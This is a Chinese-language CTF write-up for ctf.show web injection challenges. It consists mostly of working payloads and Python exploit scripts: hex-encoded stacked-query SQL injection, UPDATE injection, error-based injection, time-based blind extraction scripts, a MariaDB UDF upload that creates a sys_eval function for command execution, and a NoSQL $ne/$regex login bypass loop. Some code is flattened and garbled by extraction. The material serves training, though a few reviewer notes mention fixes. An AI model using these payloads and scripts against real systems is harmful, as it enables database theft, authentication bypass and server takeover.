?username=-1';PREPARE 0raN9e from 0x73656C6563742067726F75705F636F6E63617428636F6C756D6E5F6E616D65292066726F6D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73207768657265207461626C655F6E616D653D2763746673685F6F775F666C61676173616127;EXECUTE 0raN9e;
?username=-1';PREPARE 0raN9e from 0x73656C65637420666C6167617362612066726F6D2063746673685F6F775F666C616761736161;EXECUTE 0raN9e;ctfsh_ow_flagasaa
预处理语句转成 hex 就行,基本同 web226
web229
?username=-1';PREPARE 0raN9e from 0x73656C6563742067726F75705F636F6E63617428636F6C756D6E5F6E616D65292066726F6D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73207768657265207461626C655F6E616D653D27666C616727;EXECUTE 0raN9e;
?username=-1';PREPARE 0raN9e from 0x73656C65637420666C6167617362612066726F6D20666C6167;EXECUTE 0raN9e;
web230
?username=-1';PREPARE 0raN9e from 0x73656C6563742067726F75705F636F6E63617428636F6C756D6E5F6E616D65292066726F6D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73207768657265207461626C655F6E616D653D27666C6167616162627827;EXECUTE 0raN9e;
?username=-1';PREPARE 0raN9e from 0x73656C65637420666C616761736261732066726F6D20666C61676161626278;EXECUTE 0raN9e;
这些题都可以用这一个做法,就不多讲了
web231
$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";
从这里开始是 update 注入,在浏览器的网络请求里看一下,api 默认参数是 ?page=1&limit=10
可以进行post传参逐步得到flag
password=1',username=database()#&username=1
password=1',username=(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web')#&username=1
password=1',username=(select group_concat(column_name) from information_schema.columns where table_name='flaga')#&username=1
password=1',username=(select flagas from flaga)#&username=1
web232
password 经过了 MD5 哈希处理,用括号提前闭合就行
password=1'),username=database()#&username=1
password=1'),username=(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web')#&username=1
password=1'),username=(select group_concat(column_name) from information_schema.columns where table_name='flagaa')#&username=1
password=1'),username=(select flagass from flagaa)#&username=1
# Time-based blind injection against the delete endpoint (POST to
# /api/delete.php, `id` field, numeric context — no quote needed):
#   0 or if(substr((select flag from flag),index,1)='<char>',sleep(0.2),0)
# The accept threshold is >= 3 s although the injected delay is sleep(0.2);
# presumably the condition is evaluated once per row on the server so the
# delays add up — TODO confirm, the server side is not shown.
# get_flag_char returns the matching char or None; the driver appends and stops
# at the first None. Commented payloads are the information_schema steps.
# Inline Chinese text: 请求失败 = "request failed"; 当前 情况 / 最终 情况 =
# "current / final state"; 已结束 = "finished". `r`/`sub` are never read.
# NOTE(review): "defget_flag_char", "inrange", "returnNone" are extraction
# artefacts.
# Defender's note: `0 or ...` in a numeric `id` is the classic sign that the
# value is interpolated unquoted; casting `id` to int server-side is enough here.
import time import requests dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://5495de70-dd5c-41c5-bcab-d784b3e7f768.challenge.ctf.show/api/delete.php'
defget_flag_char(index): for char in dicts: #payload = {"id": f"0 or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',sleep(0.2),0)"} #payload = {"id": f"0 or if(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),{index},1)='{char}',sleep(0.2),0)"} payload = {"id": f"0 or if(substr((select flag from flag),{index},1)='{char}',sleep(0.2),0)"}
try: start_time = time.time() r = requests.post(url=url, data=payload).text end_time = time.time() sub = end_time - start_time if end_time - start_time >=3: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone
for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前 情况: {flag}") else: print("已结束") break print(f"最终 情况: {flag}")
# Time-based blind injection via GET `id` on /api/ (string context):
#   1' or if(substr((select flag from ctfshow_flag),index,1)='<char>',sleep(0.1),0)#
# A response taking >= 0.5 s (measured into `sub`) marks the char. The driver
# appends returned chars and stops at the first None. `requests` and `time` are
# imported outside the visible text. Commented payloads are the
# information_schema enumeration steps.
# Inline Chinese text: 请求失败 = "request failed"; 当前情况 / 最终情况 =
# "current / final state"; 已结束 = "finished".
# NOTE(review): "defget_flag_char", "inrange", "returnNone" are extraction
# artefacts; the dict literal is split across two physical lines.
dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://414d893d-2ded-40da-9e5f-cb54d1dcb9a6.challenge.ctf.show/api/'
defget_flag_char(index): for char in dicts: payload = { #"id": f"1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',sleep(0.1),0)#" #"id": f"1' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flag'),{index},1)='{char}',sleep(0.1),0)#" "id": f"1' or if(substr((select flag from ctfshow_flag),{index},1)='{char}',sleep(0.1),0)#"
} try: start_time = time.time() r = requests.get(url=url, params=payload).text end_time = time.time() sub = end_time - start_time if sub >= 0.5: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前情况: {flag}") else: print("已结束") break print(f"最终情况: {flag}")
0x02
利用报错注入
?id=0'or (select 1 from (select count(*),concat(0x7e,(database()),0x7e,floor(rand(0)*2)) as x from information_schema.columns group by x) as y)%23
?id=0'or (select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='ctfshow_web')),0x7e))%23
?id=0'or (select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='ctfshow_flag')),0x7e))%23
?id=0'or (select updatexml(1,concat(0x7e,(select flag from ctfshow_flag)),0x7e))%23
?id=0'or(select updatexml(1,concat(0x7e,substring((select flag from ctfshow_flag),1),0x7e),0x7e))%23
# Same GET `id` time-based probe as above, retargeted at ctfshow_flagsa / flag1:
#   1' or if(substr((select flag1 from ctfshow_flagsa),index,1)='<char>',sleep(0.1),0)#
# Threshold 0.5 s on `sub`; driver appends and stops at the first None.
# `requests` and `time` are imported outside the visible text.
# Inline Chinese text: 请求失败 = "request failed"; 当前情况 / 最终情况 =
# "current / final state"; 已结束 = "finished".
# NOTE(review): unlike its neighbours this copy kept its spaces ("def ", "in
# range", "return None"); structure is still flattened onto three lines.
dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://e7e68c52-a18f-469f-b68e-3e790007590b.challenge.ctf.show/api/'
def get_flag_char(index): for char in dicts: payload = { #"id": f"1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',sleep(0.1),0)#" #"id": f"1' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagsa'),{index},1)='{char}',sleep(0.1),0)#" "id": f"1' or if(substr((select flag1 from ctfshow_flagsa),{index},1)='{char}',sleep(0.1),0)#"
} try: start_time = time.time() r = requests.get(url=url, params=payload).text end_time = time.time() sub = end_time - start_time if sub >= 0.5: return char except requests.RequestException as e: print(f"请求失败: {e}") return None for i in range(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前情况: {flag}") else: print("已结束") break print(f"最终情况: {flag}")
0x02
过滤了updatexml,但是extractvalue还是可以正常使用的
?id=0'or (select extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database()))))%23
?id=0'or (select extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='ctfshow_flagsa'))))%23
?id=0'or (select extractvalue(1,concat(0x7e,substring((select flag1 from ctfshow_flagsa),-10))))%23
# Same GET `id` time-based probe, retargeted at ctfshow_flags / flag2:
#   1' or if(substr((select flag2 from ctfshow_flags),index,1)='<char>',sleep(0.1),0)#
# Threshold 0.5 s on `sub`; driver appends and stops at the first None.
# `requests` and `time` are imported outside the visible text.
# Inline Chinese text: 请求失败 = "request failed"; 当前情况 / 最终情况 =
# "current / final state"; 已结束 = "finished".
# NOTE(review): "defget_flag_char", "inrange", "returnNone" are extraction
# artefacts.
dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},' flag = '' url = 'http://2d7a2d28-52c4-4c83-90c5-1b8381016399.challenge.ctf.show/api/'
defget_flag_char(index): for char in dicts: payload = { #"id": f"1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',sleep(0.1),0)#" #"id": f"1' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flags'),{index},1)='{char}',sleep(0.1),0)#" "id": f"1' or if(substr((select flag2 from ctfshow_flags),{index},1)='{char}',sleep(0.1),0)#"
} try: start_time = time.time() r = requests.get(url=url, params=payload).text end_time = time.time() sub = end_time - start_time if sub >= 0.5: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前情况: {flag}") else: print("已结束") break print(f"最终情况: {flag}")
# Same GET `id` time-based probe; the target column is literally named `flag?`,
# so it is wrapped in backticks in the SELECT and '?' is added to the alphabet:
#   1' or if(substr((SELECT `flag?` FROM ctfshow_flagsa),index,1)='<char>',sleep(0.1),0)#
# Threshold 0.5 s on `sub`; driver appends and stops at the first None.
# `requests` and `time` are imported outside the visible text.
# Inline Chinese text: 请求失败 = "request failed"; 当前情况 / 最终情况 =
# "current / final state"; 已结束 = "finished".
# NOTE(review): "defget_flag_char", "inrange", "returnNone" are extraction
# artefacts.
dicts = '0123456789abcdefghijklmnopqrstuvwxyz-_{},?' flag = '' url = 'http://04452d8b-ead5-40c6-be43-a04620fe4583.challenge.ctf.show/api/'
defget_flag_char(index): for char in dicts: payload = { #"id": f"1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{index},1)='{char}',sleep(0.1),0)#" #"id": f"1' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagsa'),{index},1)='{char}',sleep(0.1),0)#" "id": f"1' or if(substr((SELECT `flag?` FROM ctfshow_flagsa),{index},1)='{char}',sleep(0.1),0)#"
} try: start_time = time.time() r = requests.get(url=url, params=payload).text end_time = time.time() sub = end_time - start_time if sub >= 0.5: return char except requests.RequestException as e: print(f"请求失败: {e}") returnNone for i inrange(1, 64): char = get_flag_char(i) if char: flag += char print(f"当前情况: {flag}") else: print("已结束") break print(f"最终情况: {flag}")
需要注意的是,由于列名中含有问号,所以需要用反引号把列名包起来
0x02
报错注入可以看网上wp不多赘叙
web248
这方面是知识盲区了,学一下吧
udf 全称为:user defined function,意为用户自定义函数;用户可以添加自定义的新函数到 Mysql 中,以达到功能的扩充,调用方式与一般系统自带的函数相同,例如 concat(),user(),version()等函数。udf 文件在 Windows 下后缀一般为 dll,在 Linux 下为 so,由 C、C++ 编写。
?id=1';select version();%23
查看版本,大于5.1版本,继续查 plugin 目录
?id=0';select @@plugin_dir;%23
得到路径为:/usr/lib/mariadb/plugin/
?id=0';select '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' into dumpfile '/usr/lib/mariadb/plugin/1.txt'%23
/api/?id=0';select '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' into dumpfile '/usr/lib/mariadb/plugin/2.txt'%23
/api/?id=0';select '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' into dumpfile '/usr/lib/mariadb/plugin/3.txt'%23
?id=0';select unhex(concat(load_file('/usr/lib/mariadb/plugin/1.txt'),load_file('/usr/lib/mariadb/plugin/2.txt'),load_file('/usr/lib/mariadb/plugin/3.txt'))) into dumpfile '/usr/lib/mariadb/plugin/aaa.so'%23
?id=0';create function sys_eval returns string soname 'aaa.so'%23
# Loop fragment only (`out`, `dic`, `url`, `requests`, `time` are defined outside
# the visible text). This is a NoSQL operator injection, not SQL: the form keys
# `username[$ne]` and `password[$regex]` are parsed server-side into query
# operators, so `password` is matched against the regex ^<out><k> and any
# username other than '1' is accepted. Oracle: the JSON-escaped string
# \u767b\u9646\u6210\u529f ("登陆成功", "login successful") in the response.
# Positions 9..49 are probed; 0.5 s pause after each confirmed character.
# Inline Chinese comments: 注意反斜杠需要转义 = "note the backslashes must be
# escaped"; 添加请求间隔 = "add a delay between requests"; 请求失败 = "request failed".
# Style note: the response variable `re` shadows the stdlib module name.
# NOTE(review): "inrange" and 'if"\\u767b...'in' are extraction artefacts.
# Defender's note: the fix is to reject non-string values for credential fields
# (or cast them to str) before they reach the query builder, so bracketed keys
# cannot become operators.
for j inrange(9, 50): for k in dic: payload = {'username[$ne]': '1', 'password[$regex]': f'^{out+k}'} try: re = requests.post(url, data=payload) if"\\u767b\\u9646\\u6210\\u529f"in re.text: # 注意反斜杠需要转义 out += k print(out) break except requests.exceptions.RequestException as e: print(f"请求失败: {e}") time.sleep(0.5) # 添加请求间隔